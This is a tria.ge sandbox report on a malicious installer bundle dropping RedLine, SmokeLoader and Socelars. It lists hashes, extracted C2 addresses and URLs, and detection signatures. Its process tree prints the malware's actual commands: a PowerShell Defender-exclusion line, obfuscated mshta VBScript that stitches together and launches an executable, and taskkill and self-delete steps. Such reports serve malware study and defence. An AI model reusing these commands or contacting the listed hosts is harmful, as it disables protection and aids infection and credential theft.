Windows 7 deprecation notice: Windows 7 will be removed from tria.ge on 2025-03-31.
Resubmissions
  11/10/2021, 20:45  211011-zjxjlsabbm  (score 10)
  11/10/2021, 13:10  211011-qegsxshcfp  (score 10)
  11/10/2021, 10:55  211011-mz7y3ahaak  (score 10)
  10/10/2021, 19:24  211010-x4mtssgae2  (score 10)

Analysis
  max time kernel:   1806s
  max time network:  1819s
  platform:          windows7_x64
  resource:          win7-ja-20210920
  submitted:         11/10/2021, 10:55
Static task
  static1

Behavioral tasks (sample: setup_x86_x64_install.exe for all)
  behavioral1  resource: win7-ja-20210920
  behavioral2  resource: win7v20210408
  behavioral3  resource: win7-de-20210920
  behavioral4  resource: win11
  behavioral5  resource: win10v20210408
  behavioral6  resource: win10-ja-20210920
General
  Target:  setup_x86_x64_install.exe
  Size:    3.9MB
  MD5:     a4d23ac3c7172b9aa02e35b6bf0fd21f
  SHA1:    0326aab7deddfefc048c9a67ac9ce4ee14ea9003
  SHA256:  9bd142ecfe89857de80bb3255a1655f680ca6451b45cca235096dc1c1285e806
  SHA512:  9e425d8a1beaeabfc983bb75a7a5f8a8c0823e825e9f66e17b0f515b2897da9f2d9b2f1aa9939fdbae6c826c2c730d3bc772abec9e35a61d3d73a6cdb87ddf10
Malware Config

Extracted: redline
  Botnet:  she
  C2:      135.181.129.119:4805

Extracted: smokeloader
  Version: 2020
  C2:
    http://gmpeople.com/upload/
    http://mile48.com/upload/
    http://lecanardstsornin.com/upload/
    http://m3600.com/upload/
    http://camasirx.com/upload/

Extracted: redline
  Botnet:  ANI
  C2:      45.142.215.47:27643
Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (6 IoCs)
  resource                                                                      yara_rule
  behavioral1/memory/2024-199-0x00000000003B0000-0x00000000003CF000-memory.dmp  family_redline
  behavioral1/memory/2024-207-0x00000000019F0000-0x0000000001A0D000-memory.dmp  family_redline
  behavioral1/memory/2184-246-0x0000000000400000-0x0000000000422000-memory.dmp  family_redline
  behavioral1/memory/2184-243-0x0000000000400000-0x0000000000422000-memory.dmp  family_redline
  behavioral1/memory/2184-248-0x0000000000400000-0x0000000000422000-memory.dmp  family_redline
  behavioral1/memory/2184-251-0x000000000041B23A-mapping.dmp                    family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (3 IoCs)
  resource                                      yara_rule
  behavioral1/files/0x00050000000131ea-102.dat  family_socelars
  behavioral1/files/0x00050000000131ea-163.dat  family_socelars
  behavioral1/files/0x00050000000131ea-135.dat  family_socelars

suricata: ET MALWARE GCleaner Downloader Activity M5

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)

Yara rule match: aspack_v212_v242 (6 IoCs)
  resource                                     yara_rule
  behavioral1/files/0x000500000001267c-70.dat  aspack_v212_v242
  behavioral1/files/0x000500000001267c-71.dat  aspack_v212_v242
  behavioral1/files/0x0006000000012634-72.dat  aspack_v212_v242
  behavioral1/files/0x0006000000012634-73.dat  aspack_v212_v242
  behavioral1/files/0x00050000000126a2-76.dat  aspack_v212_v242
  behavioral1/files/0x00050000000126a2-77.dat  aspack_v212_v242

Downloads MZ/PE file

Executes dropped EXE (25 IoCs)
  pid   Process
  1184  setup_installer.exe
  1060  setup_install.exe
  700   Sun152bab5a2de.exe
  320   Sun1577c3e159a3e3815.exe
  1884  Sun159ff1acacf.exe
  1160  Sun1507db358fce61c0b.exe
  824   Sun15dbd675f871ca.exe
  1776  Sun15901f2f025e.exe
  1148  Sun15f67075f27a2b5b.exe
  2024  Sun15f1b1f8c669.exe
  1328  Sun152bea652bd7232.exe
  1348  Sun158d8ef840.exe
  1560  Sun152e52d07b74d9b5.exe
  2424  09xU.exE
  2484  w1CFQ6ffZ6sxCNcHQMfq73m0.exe
  2936  7169928.scr
  3012  3575431.scr
  2184  Sun159ff1acacf.exe
  764   WinHoster.exe
  2928  6430286.scr
  2132  2730126.scr
  2392  E521.exe
  1124  eevtgij
  2588  eevtgij
  2428  eevtgij

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  description        ioc                                                              process
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion  6430286.scr
  Key value queried  \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion   6430286.scr

Checks computer location settings (2 TTPs, 1 IoC)
Looks up country code configured in the registry, likely geofence.
  description        ioc                                                                                                    process
  Key value queried  \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Control Panel\International\Geo\Nation  Sun15dbd675f871ca.exe

Loads dropped DLL (64 IoCs)
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Adds Run key to start application (2 TTPs, 1 IoC)
  description      ioc                                                                                                                                                                              process
  Set value (str)  \REGISTRY\USER\S-1-5-21-3456797065-1076791440-4146276586-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"  3575431.scr

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Checks whether UAC is enabled
  description        ioc                                                                                process
  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA  6430286.scr

Legitimate hosting services abused for malware hosting/C2 (1 TTP)

Looks up external IP address via web service (3 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
  flow  ioc
  16    ip-api.com
  35    ipinfo.io
  36    ipinfo.io

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
  pid   Process
  2928  6430286.scr

Suspicious use of SetThreadContext (1 IoC)
  description                          pid   Process             procid_target
  PID 1884 set thread context of 2184  1884  Sun159ff1acacf.exe  59

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Program crash (2 IoCs)
  pid   pid_target  Process       procid_target
  2656  824         WerFault.exe  56
  1804  1560        WerFault.exe  45

Checks SCSI registry key(s) (3 TTPs, 12 IoCs)
SCSI information is often read in order to detect sandboxing environments.
  description     ioc                                               process
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  cmd.exe
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  cmd.exe
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij
  Key opened      \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  cmd.exe
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij
  Key queried     \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij
  Key enumerated  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  eevtgij

Kills process with taskkill (3 IoCs)
  pid   Process
  2440  taskkill.exe
  2600  taskkill.exe
  1812  taskkill.exe

Modifies system certificate store
  description       ioc                                                                                                                                 process
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436              Sun15901f2f025e.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = …    Sun15901f2f025e.exe
  Key created       \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349              Sun15f67075f27a2b5b.exe
  Set value (data)  \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = …    Sun15f67075f27a2b5b.exe

Suspicious behavior: EnumeratesProcesses (64 IoCs)
Suspicious behavior: GetForegroundWindowSpam (3 IoCs)
  pid   Process
  1364  Process not Found
  2656  WerFault.exe
  1804  WerFault.exe

Suspicious behavior: MapViewOfSection (4 IoCs)
  pid   Process
  1160  cmd.exe
  1124  eevtgij
  2588  eevtgij
  2428  eevtgij

Suspicious use of AdjustPrivilegeToken (61 IoCs)
Suspicious use of WriteProcessMemory (64 IoCs)
Processes

[1] "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"  (PID 1148)
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
  [2] "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"  (PID 1184)
      - Executes dropped EXE
      - Loads dropped DLL
      - Suspicious use of WriteProcessMemory
    [3] "C:\Users\Admin\AppData\Local\Temp\7zS0A482296\setup_install.exe"  (PID 1060)
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"  (PID 1592)
          image: C:\Windows\SysWOW64\cmd.exe
        [5] powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"  (PID 1300)
            image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe /c Sun152bab5a2de.exe  (PID 2028)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
        [5] Sun152bab5a2de.exe  (PID 700)
            image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun152bab5a2de.exe
            - Executes dropped EXE
            - Loads dropped DLL
      [4] C:\Windows\system32\cmd.exe /c Sun15901f2f025e.exe  (PID 620)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
        [5] Sun15901f2f025e.exe  (PID 1776)
            image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun15901f2f025e.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Modifies system certificate store
            - Suspicious use of AdjustPrivilegeToken
          [6] cmd.exe /c taskkill /f /im chrome.exe  (PID 1160)
              image: C:\Windows\SysWOW64\cmd.exe
              - Checks SCSI registry key(s)
              - Suspicious behavior: EnumeratesProcesses
              - Suspicious behavior: MapViewOfSection
            [7] taskkill /f /im chrome.exe  (PID 1812)
                image: C:\Windows\SysWOW64\taskkill.exe
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe /c Sun15dbd675f871ca.exe  (PID 1488)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
        [5] Sun15dbd675f871ca.exe  (PID 824)
            image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun15dbd675f871ca.exe
            - Executes dropped EXE
            - Checks computer location settings
            - Loads dropped DLL
            - Suspicious behavior: EnumeratesProcesses
          [6] "C:\Users\Admin\Pictures\Adobe Films\w1CFQ6ffZ6sxCNcHQMfq73m0.exe"  (PID 2484)
              - Executes dropped EXE
              - Suspicious behavior: EnumeratesProcesses
          [6] C:\Windows\SysWOW64\WerFault.exe -u -p 824 -s 652  (PID 2656)
              - Loads dropped DLL
              - Program crash
              - Suspicious behavior: GetForegroundWindowSpam
              - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe /c Sun15f67075f27a2b5b.exe  (PID 556)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
        [5] Sun15f67075f27a2b5b.exe  (PID 1148)
            image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun15f67075f27a2b5b.exe
            - Executes dropped EXE
            - Modifies system certificate store
            - Suspicious use of AdjustPrivilegeToken
          [6] "C:\Users\Admin\AppData\Roaming\7169928.scr" /S  (PID 2936)
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
          [6] "C:\Users\Admin\AppData\Roaming\3575431.scr" /S  (PID 3012)
              - Executes dropped EXE
              - Loads dropped DLL
              - Adds Run key to start application
            [7] "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"  (PID 764)
                - Executes dropped EXE
                - Loads dropped DLL
          [6] "C:\Users\Admin\AppData\Roaming\6430286.scr" /S  (PID 2928)
              - Executes dropped EXE
              - Checks BIOS information in registry
              - Checks whether UAC is enabled
              - Suspicious use of NtSetInformationThreadHideFromDebugger
          [6] "C:\Users\Admin\AppData\Roaming\2730126.scr" /S  (PID 2132)
              - Executes dropped EXE
              - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe /c Sun1577c3e159a3e3815.exe /mixone  (PID 1984)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
        [5] Sun1577c3e159a3e3815.exe /mixone  (PID 320)
            image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun1577c3e159a3e3815.exe
            - Executes dropped EXE
            - Loads dropped DLL
          [6] "C:\Windows\System32\cmd.exe" /c taskkill /im "Sun1577c3e159a3e3815.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun1577c3e159a3e3815.exe" & exit  (PID 2564)
              image: C:\Windows\SysWOW64\cmd.exe
            [7] taskkill /im "Sun1577c3e159a3e3815.exe" /f  (PID 2600)
                image: C:\Windows\SysWOW64\taskkill.exe
                - Kills process with taskkill
                - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe /c Sun15f1b1f8c669.exe  (PID 960)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
        [5] Sun15f1b1f8c669.exe  (PID 2024)
            image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun15f1b1f8c669.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe /c Sun159ff1acacf.exe  (PID 588)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
        [5] Sun159ff1acacf.exe  (PID 1884)
            image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun159ff1acacf.exe
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of SetThreadContext
          [6] C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun159ff1acacf.exe  (PID 2184)
              - Executes dropped EXE
              - Loads dropped DLL
              - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\system32\cmd.exe /c Sun152e52d07b74d9b5.exe  (PID 1492)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
      [4] C:\Windows\system32\cmd.exe /c Sun158d8ef840.exe  (PID 1612)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
      [4] C:\Windows\system32\cmd.exe /c Sun1507db358fce61c0b.exe  (PID 1640)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL
      [4] C:\Windows\system32\cmd.exe /c Sun152bea652bd7232.exe  (PID 432)
          image: C:\Windows\SysWOW64\cmd.exe
          - Loads dropped DLL

[1] Sun152bea652bd7232.exe  (PID 1328)
    image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun152bea652bd7232.exe
    - Executes dropped EXE

[1] Sun158d8ef840.exe  (PID 1348)
    image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe
    - Executes dropped EXE
    - Loads dropped DLL
  [2] "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If """" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )  (PID 1168)
      image: C:\Windows\SysWOW64\mshta.exe
    [3] "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "" =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun158d8ef840.exe") do taskkill /F -Im "%~NxU"  (PID 2348)
        image: C:\Windows\SysWOW64\cmd.exe
        - Loads dropped DLL
      [4] 09xU.EXE -pPtzyIkqLZoCarb5ew  (PID 2424)
          image: C:\Users\Admin\AppData\Local\Temp\09xU.exE
          - Executes dropped EXE
          - Loads dropped DLL
        [5] "C:\Windows\System32\mshta.exe" VbsCRiPT: cLosE (CrEaTeOBJeCt ( "WScrIPT.SheLL" ).RuN ("CMD.exe /c copy /y ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"" 09xU.exE && STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If ""-pPtzyIkqLZoCarb5ew "" =="""" for %U iN ( ""C:\Users\Admin\AppData\Local\Temp\09xU.exE"") do taskkill /F -Im ""%~NxU"" " , 0 , tRUe) )  (PID 2508)
            image: C:\Windows\SysWOW64\mshta.exe
          [6] "C:\Windows\System32\cmd.exe" /c copy /y "C:\Users\Admin\AppData\Local\Temp\09xU.exE" 09xU.exE &&STarT 09xU.EXE -pPtzyIkqLZoCarb5ew & If "-pPtzyIkqLZoCarb5ew " =="" for %U iN ( "C:\Users\Admin\AppData\Local\Temp\09xU.exE") do taskkill /F -Im "%~NxU"  (PID 2672)
              image: C:\Windows\SysWOW64\cmd.exe
        [5] "C:\Windows\System32\mshta.exe" vbScRipT: cloSE ( creAteobjECT ( "WscriPT.SHell" ). RuN ( "cMd.exE /Q /r eCHO | SET /P = ""MZ"" > ScMeAP.SU & CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH + 7TCInEJp.0 + yKIfDQA.1 r6f7sE.I & StART control .\R6f7sE.I " ,0,TRuE) )  (PID 2784)
            image: C:\Windows\SysWOW64\mshta.exe
          [6] "C:\Windows\System32\cmd.exe" /Q /r eCHO | SET /P = "MZ" > ScMeAP.SU &CoPY /b /Y ScMeAp.SU + 20L2VNO.2 + gUVIl5.SCH +7TCInEJp.0 + yKIfDQA.1 r6f7sE.I& StART control .\R6f7sE.I  (PID 2852)
              image: C:\Windows\SysWOW64\cmd.exe
            [7] C:\Windows\system32\cmd.exe /S /D /c" eCHO "  (PID 2900)
                image: C:\Windows\SysWOW64\cmd.exe
            [7] C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>ScMeAP.SU"  (PID 2912)
                image: C:\Windows\SysWOW64\cmd.exe
            [7] control .\R6f7sE.I  (PID 2976)
                image: C:\Windows\SysWOW64\control.exe
              [8] "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\R6f7sE.I  (PID 3068)
                  image: C:\Windows\SysWOW64\rundll32.exe
                  - Loads dropped DLL
                [9] C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\R6f7sE.I  (PID 396)
                  [10] "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\R6f7sE.I  (PID 1828)
      [4] taskkill /F -Im "Sun158d8ef840.exe"  (PID 2440)
          image: C:\Windows\SysWOW64\taskkill.exe
          - Kills process with taskkill
          - Suspicious use of AdjustPrivilegeToken

[1] Sun152e52d07b74d9b5.exe  (PID 1560)
    image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun152e52d07b74d9b5.exe
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
  [2] C:\Windows\system32\WerFault.exe -u -p 1560 -s 1728  (PID 1804)
      - Program crash
      - Suspicious behavior: GetForegroundWindowSpam
      - Suspicious use of AdjustPrivilegeToken

[1] Sun1507db358fce61c0b.exe  (PID 1160)
    image: C:\Users\Admin\AppData\Local\Temp\7zS0A482296\Sun1507db358fce61c0b.exe
    - Executes dropped EXE
    - Loads dropped DLL

[1] C:\Users\Admin\AppData\Local\Temp\E521.exe  (PID 2392)
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken

[1] taskeng.exe {E355680D-963D-4780-9269-09886BA69FFB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]  (PID 2992)
    image: C:\Windows\system32\taskeng.exe
  [2] C:\Users\Admin\AppData\Roaming\eevtgij  (PID 1124)
      - Executes dropped EXE
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection

[1] taskeng.exe {9EF99C59-DEEA-4C79-AC5B-822CBDDAA797} S-1-5-18:NT AUTHORITY\System:Service:  (PID 2604)
    image: C:\Windows\system32\taskeng.exe

[1] taskeng.exe {235BB499-33BA-47B2-93BC-D3F120267A63} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]  (PID 960)
    image: C:\Windows\system32\taskeng.exe
  [2] "C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task  (PID 2860)
  [2] C:\Users\Admin\AppData\Roaming\eevtgij  (PID 2588)
      - Executes dropped EXE
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection

[1] taskeng.exe {6B310306-7C83-4A8A-9881-8D238DA0252B} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]  (PID 1992)
    image: C:\Windows\system32\taskeng.exe
  [2] C:\Users\Admin\AppData\Roaming\eevtgij  (PID 2428)
      - Executes dropped EXE
      - Checks SCSI registry key(s)
      - Suspicious behavior: MapViewOfSection
MITRE ATT&CK Enterprise v6

Defense Evasion
  Disabling Security Tools (1)
  Install Root Certificate (1)
  Modify Registry (3)
  Virtualization/Sandbox Evasion (1)
  Web Service (1)